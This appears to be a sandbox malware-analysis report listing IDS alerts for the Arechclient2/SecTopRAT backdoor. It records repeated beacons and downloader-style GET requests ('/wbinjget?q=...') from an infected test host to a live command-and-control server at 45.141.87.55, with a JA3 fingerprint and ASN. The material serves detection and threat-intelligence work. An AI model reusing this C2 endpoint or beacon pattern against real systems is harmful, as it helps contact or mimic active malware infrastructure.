                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49811 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49853 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49799 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.87.55:15647 -> 192.168.2.7:49787
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49826 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49866 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49837 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49863 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49872 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49885 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49881 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49889 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49876 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49898 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49895 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49904 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49908 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49917 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49927 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49935 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49939 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49948 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49952 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49957 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49962 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49966 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49971 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49975 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49979 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49983 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49930 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49921 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49821 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49831 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49989 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49943 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.7:49913 -> 45.141.87.55:9000
                            Connects to many ports of the same IP (likely port scanning)
                            Source: global trafficTCP traffic: 45.141.87.55 ports 9000,1,4,5,6,7,15647
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49794
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49799
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49803
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49806
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49811
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49817
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49821
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49826
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49831
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49837
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49840
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49845
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49849
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49853
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49858
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49863
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49866
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49872
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49876
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49881
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49885
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49889
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49895
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49898
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49904
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49908
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49913
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49917
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49921
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49927
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49930
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49935
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49939
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49943
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49948
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49952
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49957
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49962
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49966
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49971
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49975
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49979
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49983
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49989
                            Source: global trafficTCP traffic: 192.168.2.7:49787 -> 45.141.87.55:15647
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: Joe Sandbox ViewIP Address: 45.141.87.55 45.141.87.55
                            Source: Joe Sandbox ViewASN Name: CLOUDBACKBONERU CLOUDBACKBONERU
                            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49817 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49803 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49821 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49845 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49840 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49811 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49837 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49898 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49908 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49917 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49927 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49935 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49939 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49952 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49966 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49975 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49979 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49983 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49831 -> 45.141.87.55:9000
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49989 -> 45.141.87.55:9000
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: unknownTCP traffic detected without corresponding DNS query: 45.141.87.55
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
                            Source: global trafficHTTP traffic detected: GET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1Host: 45.141.87.55:9000
